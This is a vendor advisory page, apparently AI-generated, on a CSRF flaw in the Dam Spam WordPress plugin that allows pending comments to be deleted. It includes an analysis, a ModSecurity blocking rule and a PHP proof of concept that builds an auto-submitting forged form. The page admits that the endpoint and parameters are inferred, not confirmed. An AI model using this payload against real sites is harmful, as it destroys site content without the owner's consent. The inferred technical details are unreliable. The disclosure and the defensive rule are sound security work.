Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-2112: Dam Spam <= 1.0.8 – Cross-Site Request Forgery to Arbitrary Pending Comment Deletion (dam-spam)

CVE ID CVE-2026-2112
Plugin dam-spam
Severity Medium (CVSS 4.3)
CWE 352
Vulnerable Version 1.0.8
Patched Version
Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2112 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the Dam Spam WordPress plugin, versions up to and including 1.0.8. The issue resides in the plugin’s cleanup page, where the pending comment deletion action lacks nonce verification. This allows unauthenticated attackers to delete all pending comments by tricking a site administrator into performing an action like clicking a malicious link. The CVSS score of 4.3 (Medium) reflects the requirement for user interaction and the limited impact on integrity.

Atomic Edge research indicates the root cause is missing nonce validation on a specific administrative function. The CWE-352 classification confirms a CSRF pattern where a state-changing action does not verify the request originates from an intended user. The vulnerability description explicitly states the missing nonce verification occurs on the pending comment deletion action in the cleanup page. Without access to source code, Atomic Edge infers the plugin likely uses a WordPress hook, such as `admin_post_{action}` or a custom admin menu callback, to handle the deletion request. The absence of a capability check for the requestor is not implied, as CSRF exploits the victim’s existing session and privileges.

Exploitation requires an attacker to craft a malicious web page or link that submits a forged HTTP request to the vulnerable WordPress endpoint. The attacker must lure a logged-in administrator to interact with this payload. Based on WordPress plugin conventions and the described ‘cleanup page,’ Atomic Edge infers the likely attack vector is a POST request to either `/wp-admin/admin.php?page={dam-spam-cleanup-slug}` or `/wp-admin/admin-post.php` with an action parameter. The payload would contain parameters instructing the plugin to delete pending comments, such as `action=dam_spam_delete_pending` and possibly `confirm=1` or `nonce=` with a blank or predictable value.

Remediation for this vulnerability requires implementing proper nonce verification. The patched version, 1.0.9, presumably added a call to `check_admin_referer()` or `wp_verify_nonce()` within the function handling the pending comment deletion. This ensures the request contains a cryptographically secure token tied to the user’s session, proving intent. The fix should also confirm the user has the appropriate capability, such as `moderate_comments`, though this check was likely already present and not the cause of the flaw.

The impact of successful exploitation is the unauthorized deletion of all pending comments on the WordPress site. This constitutes a loss of data integrity and can disrupt site moderation workflows. The attack does not allow for privilege escalation, remote code execution, or data theft. However, deleting pending comments can silence user feedback, remove legitimate content awaiting review, and generally undermine site administration.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity 
# Atomic Edge WAF Rule - CVE-2026-2112 (metadata-based)
# This rule blocks CSRF exploitation attempts targeting the Dam Spam plugin's pending comment deletion action.
# The rule matches POST requests to the WordPress admin area that contain the inferred action parameter.
# It is narrowly scoped to the likely admin endpoint and specific action parameter.
SecRule REQUEST_METHOD "@streq POST" 
  "id:1002112,phase:2,deny,status:403,chain,msg:'CVE-2026-2112: Dam Spam Plugin CSRF to Pending Comment Deletion',severity:'CRITICAL',tag:'CVE-2026-2112',tag:'WordPress',tag:'Plugin/Dam-Spam',tag:'Attack/CSRF'"
  SecRule REQUEST_URI "@rx /wp-admin/admin.(php|post.php)$" 
    "chain"
    SecRule ARGS_POST:action "@streq dam_spam_delete_pending" 
      "chain"
      SecRule &ARGS_POST:_wpnonce "@eq 0" 
        "t:none,setvar:'tx.cve_2026_2112_block=1'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2112 - Dam Spam <= 1.0.8 - Cross-Site Request Forgery to Arbitrary Pending Comment Deletion
<?php
/**
 * Proof of Concept for CVE-2026-2112.
 * This script generates an HTML page that contains a forged form to exploit the CSRF vulnerability.
 * When a logged-in WordPress administrator visits this page, the form auto-submits via POST,
 * triggering the pending comment deletion action in the Dam Spam plugin.
 * ASSUMPTIONS:
 * 1. The vulnerable endpoint is /wp-admin/admin.php with a page parameter for the plugin's cleanup page.
 * 2. The action parameter for deletion is 'dam_spam_delete_pending' (inferred from plugin slug).
 * 3. The request may require additional parameters like 'confirm' or 'delete_all'.
 * 4. The plugin does not validate a nonce or referer on this endpoint.
 */
$target_url = 'http://vulnerable-site.example.com/wp-admin/admin.php';
$action_param = 'dam_spam_delete_pending'; // Inferred action name
?>
<!DOCTYPE html>
<html>
<head>
    <title>Redirecting...</title>
</head>
<body>
    <form id="csrf_form" method="POST" action="<?php echo htmlspecialchars($target_url); ?>">
        <input type="hidden" name="page" value="dam_spam_cleanup" />
        <input type="hidden" name="action" value="<?php echo htmlspecialchars($action_param); ?>" />
        <input type="hidden" name="delete_all" value="1" />
        <!-- If a nonce field exists but is not validated, we can submit an empty value -->
        <input type="hidden" name="_wpnonce" value="" />
    </form>
    <script>
        // Auto-submit the form when the page loads
        document.getElementById('csrf_form').submit();
    </script>
</body>
</html>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School